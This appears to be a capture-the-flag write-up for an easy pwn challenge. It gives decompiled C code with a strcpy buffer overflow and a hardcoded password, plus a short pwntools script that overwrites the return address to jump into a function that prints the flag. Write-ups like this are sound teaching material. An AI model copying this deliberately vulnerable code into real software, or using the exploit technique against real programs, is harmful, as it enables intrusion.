pwn - RUN NOW

Run run run!!!

November 5, 2025 October 15, 2025 Easy
Author Author Hung Nguyen Tuong

Source Code

main() 

int __fastcall main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // eax
  int choice; // [rsp+Ch] [rbp-84h] BYREF
  char buffer[128]; // [rsp+10h] [rbp-80h] BYREF

  setup(argc, argv, envp);
  v3 = time(0);
  srand(v3);
  while ( 1 )
  {
    puts("\nQuantum Teleporter Menu:");
    puts("1. Enter coordinates");
    puts("2. View current coordinates");
    puts("3. Initiate teleportation");
    puts("4. Exit");
    printf("Enter your choice: ");
    scanf("%d", &choice);
    getchar();
    if ( choice == 4 )
      break;
    if ( choice > 4 )
      goto invalid_choice;
    switch ( choice )
    {
      case 3:
        teleport();
        break;
      case 1:
        printf("Enter quantum coordinates: ");
        fgets(buffer, 128, stdin);
        quantum_entangle(buffer);
        break;
      case 2:
        print_coordinates();
        break;
      default:
invalid_choice:
        puts("Invalid choice. Please try again.");
        break;
    }
  }
  puts("Exiting Quantum Teleporter. Goodbye!");
  return 0;
}

quantum_entangle() 

char *__fastcall quantum_entangle(const char *buffer)
{
  char dest[64]; // [rsp+10h] [rbp-40h] BYREF

  return strcpy(dest, buffer);
}

print_coordinates() 

int print_coordinates()
{
  int Z; // r12d
  int Y; // ebx
  int X; // eax

  Z = rand() % 1000;
  Y = rand() % 1000;
  X = rand();
  return printf("Current coordinates: X=%d, Y=%d, Z=%d\n", X % 1000, Y, Z);
}

teleport() 

int teleport()
{
  puts("Initiating quantum teleportation...");
  sleep(2u);
  return puts("Teleportation successful!");
}

secret_lab() 

int secret_lab()
{
  char pw[16]; // [rsp+0h] [rbp-10h] BYREF

  printf("Enter the secret lab password: ");
  fgets(pw, 16, stdin);
  pw[strcspn(pw, "\n")] = 0;
  if ( strcmp(pw, "qu4ntumR3ality") )
  {
    puts("Access denied. Intruder alert!");
    exit(1);
  }
  puts("Access granted to the secret lab!");
  return system("cat flag.txt");
}

Mitigation

Solve

Chỉ cần ghi đè đến return address đến return system("cat flag.txt"); là xong.

Script 

from pwn import *

p = process('./chall')
elf = ELF('./chall')

p.sendlineafter(b'choice: ', b'1')

p.sendlineafter(b'coordinates: ', b'a' * 72 + p64(elf.symbols['secret_lab'] + 120))

print(p.recvall().decode())
pwn - BugBounty